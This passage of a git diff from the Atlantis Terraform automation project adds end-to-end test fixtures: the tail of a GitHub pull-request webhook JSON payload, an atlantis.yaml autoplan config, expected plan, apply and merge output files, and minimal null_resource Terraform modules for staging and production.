+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "repo": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:09Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 7,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 2,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 2,
+ "watchers": 0,
+ "default_branch": "master"
+ }
+ },
+ "base": {
+ "label": "runatlantis:master",
+ "ref": "master",
+ "sha": "f59a822e83b3cd193142c7624ea635a5d7894388",
+ "user": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "repo": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:09Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 7,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 2,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 2,
+ "watchers": 0,
+ "default_branch": "master"
+ }
+ },
+ "_links": {
+ "self": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2"
+ },
+ "html": {
+ "href": "https://github.com/runatlantis/atlantis-tests/pull/2"
+ },
+ "issue": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2"
+ },
+ "comments": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/2/comments"
+ },
+ "review_comments": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/comments"
+ },
+ "review_comment": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/comments{/number}"
+ },
+ "commits": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/2/commits"
+ },
+ "statuses": {
+ "href": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/c31fd9ea6f557ad2ea659944c3844a059b83bc5d"
+ }
+ },
+ "author_association": "OWNER",
+ "merged": false,
+ "mergeable": null,
+ "rebaseable": null,
+ "mergeable_state": "unknown",
+ "merged_by": null,
+ "comments": 0,
+ "review_comments": 0,
+ "maintainer_can_modify": false,
+ "commits": 5,
+ "additions": 181,
+ "deletions": 8,
+ "changed_files": 23
+ },
+ "repository": {
+ "id": 136474117,
+ "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=",
+ "name": "atlantis-tests",
+ "full_name": "runatlantis/atlantis-tests",
+ "owner": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ },
+ "private": false,
+ "html_url": "https://github.com/runatlantis/atlantis-tests",
+ "description": "A set of terraform projects that atlantis e2e tests run on.",
+ "fork": true,
+ "url": "https://api.github.com/repos/runatlantis/atlantis-tests",
+ "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks",
+ "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}",
+ "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}",
+ "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams",
+ "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks",
+ "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}",
+ "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events",
+ "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}",
+ "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}",
+ "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags",
+ "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}",
+ "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}",
+ "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}",
+ "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}",
+ "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}",
+ "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages",
+ "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers",
+ "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors",
+ "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers",
+ "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription",
+ "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}",
+ "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}",
+ "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}",
+ "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}",
+ "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}",
+ "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}",
+ "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges",
+ "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}",
+ "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads",
+ "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}",
+ "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}",
+ "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}",
+ "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}",
+ "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}",
+ "releases_url": "https://api.github.com/repos/runatlantis/atlantis-tests/releases{/id}",
+ "deployments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/deployments",
+ "created_at": "2018-06-07T12:28:23Z",
+ "updated_at": "2018-06-07T12:28:27Z",
+ "pushed_at": "2018-06-11T16:22:09Z",
+ "git_url": "git://github.com/runatlantis/atlantis-tests.git",
+ "ssh_url": "git@github.com:runatlantis/atlantis-tests.git",
+ "clone_url": "https://github.com/runatlantis/atlantis-tests.git",
+ "svn_url": "https://github.com/runatlantis/atlantis-tests",
+ "homepage": null,
+ "size": 7,
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "language": "HCL",
+ "has_issues": false,
+ "has_projects": true,
+ "has_downloads": true,
+ "has_wiki": false,
+ "has_pages": false,
+ "forks_count": 0,
+ "mirror_url": null,
+ "archived": false,
+ "open_issues_count": 2,
+ "license": {
+ "key": "other",
+ "name": "Other",
+ "spdx_id": null,
+ "url": null,
+ "node_id": "MDc6TGljZW5zZTA="
+ },
+ "forks": 0,
+ "open_issues": 2,
+ "watchers": 0,
+ "default_branch": "master"
+ },
+ "sender": {
+ "login": "runatlantis",
+ "id": 1034429,
+ "node_id": "MDQ6VXNlcjEwMzQ0Mjk=",
+ "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4",
+ "gravatar_id": "",
+ "url": "https://api.github.com/users/runatlantis",
+ "html_url": "https://github.com/runatlantis",
+ "followers_url": "https://api.github.com/users/runatlantis/followers",
+ "following_url": "https://api.github.com/users/runatlantis/following{/other_user}",
+ "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}",
+ "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}",
+ "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions",
+ "organizations_url": "https://api.github.com/users/runatlantis/orgs",
+ "repos_url": "https://api.github.com/users/runatlantis/repos",
+ "events_url": "https://api.github.com/users/runatlantis/events{/privacy}",
+ "received_events_url": "https://api.github.com/users/runatlantis/received_events",
+ "type": "User",
+ "site_admin": false
+ }
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/atlantis.yaml b/server/testfixtures/test-repos/modules-yaml/atlantis.yaml
new file mode 100644
index 0000000000..e5915f3911
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/atlantis.yaml
@@ -0,0 +1,8 @@
+version: 2
+projects:
+- dir: staging
+ autoplan:
+ when_modified: ["**/*.tf", "../modules/null/*"]
+- dir: production
+ autoplan:
+ when_modified: ["**/*.tf", "../modules/null/*"]
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt
new file mode 100644
index 0000000000..f0608bcf22
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `production` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = production
+
+```
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..ffc7878fe5
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `staging` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = staging
+
+```
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt
new file mode 100644
index 0000000000..295fbdddae
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-autoplan.txt
@@ -0,0 +1,51 @@
+Ran Plan for 2 projects:
+1. workspace: `default` dir: `staging`
+1. workspace: `default` dir: `production`
+
+### 1. workspace: `default` dir: `staging`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+### 2. workspace: `default` dir: `production`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+---
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt
new file mode 100644
index 0000000000..9712df1ee2
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-all-dirs.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/production` workspace: `default`
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt
new file mode 100644
index 0000000000..49c8312cd7
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge-only-staging.txt
@@ -0,0 +1,3 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- path: `runatlantis/atlantis-tests/staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
new file mode 100644
index 0000000000..9c553b9717
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt
@@ -0,0 +1,4 @@
+Locks and plans deleted for the projects and workspaces modified in this pull request:
+
+- dir: `production` workspace: `default`
+- dir: `staging` workspace: `default`
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt
new file mode 100644
index 0000000000..caea5e6434
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-production.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `production` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt
new file mode 100644
index 0000000000..0e77a94421
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/exp-output-plan-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `staging` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
+ id:
+Plan: 1 to add, 0 to change, 0 to destroy.
+
+```
+
+* To **discard** this plan click [here](lock-url).
+
diff --git a/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf b/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf
new file mode 100644
index 0000000000..14f6a189c1
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/modules/null/main.tf
@@ -0,0 +1,10 @@
+variable "var" {}
+resource "null_resource" "this" {
+}
+output "var" {
+ value = "${var.var}"
+}
+
+output "workspace" {
+ value = "${terraform.workspace}"
+}
diff --git a/server/testfixtures/test-repos/modules-yaml/production/main.tf b/server/testfixtures/test-repos/modules-yaml/production/main.tf
new file mode 100644
index 0000000000..94a103ffba
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/production/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+ source = "../modules/null"
+ var = "production"
+}
+output "var" {
+ value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules-yaml/staging/main.tf b/server/testfixtures/test-repos/modules-yaml/staging/main.tf
new file mode 100644
index 0000000000..15fa81303a
--- /dev/null
+++ b/server/testfixtures/test-repos/modules-yaml/staging/main.tf
@@ -0,0 +1,7 @@
+module "null" {
+ source = "../modules/null"
+ var = "staging"
+}
+output "var" {
+ value = "${module.null.var}"
+}
\ No newline at end of file
diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt
new file mode 100644
index 0000000000..f0608bcf22
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `production` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = production
+
+```
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt
new file mode 100644
index 0000000000..ffc7878fe5
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt
@@ -0,0 +1,13 @@
+Ran Apply in dir: `staging` workspace: `default`
+```diff
+module.null.null_resource.this: Creating...
+module.null.null_resource.this: Creation complete after *s (ID: ******************)
+
+Apply complete! Resources: 1 added, 0 changed, 0 destroyed.
+
+Outputs:
+
+var = staging
+
+```
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt
new file mode 100644
index 0000000000..63b09ca64f
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-modules.txt
@@ -0,0 +1,2 @@
+Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.
+
diff --git a/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt
new file mode 100644
index 0000000000..0e77a94421
--- /dev/null
+++ b/server/testfixtures/test-repos/modules/exp-output-autoplan-only-staging.txt
@@ -0,0 +1,23 @@
+Ran Plan in dir: `staging` workspace: `default`
+```diff
+Refreshing Terraform state in-memory prior to plan...
+The refreshed state will be used to calculate this plan, but will not be
+persisted to local or remote state storage.
+
+
+------------------------------------------------------------------------
+
+An execution plan has been generated and is shown below.
+Resource actions are indicated with the following symbols:
+ + create
+
+Terraform will perform the following actions:
+
++ module.null.null_resource.this
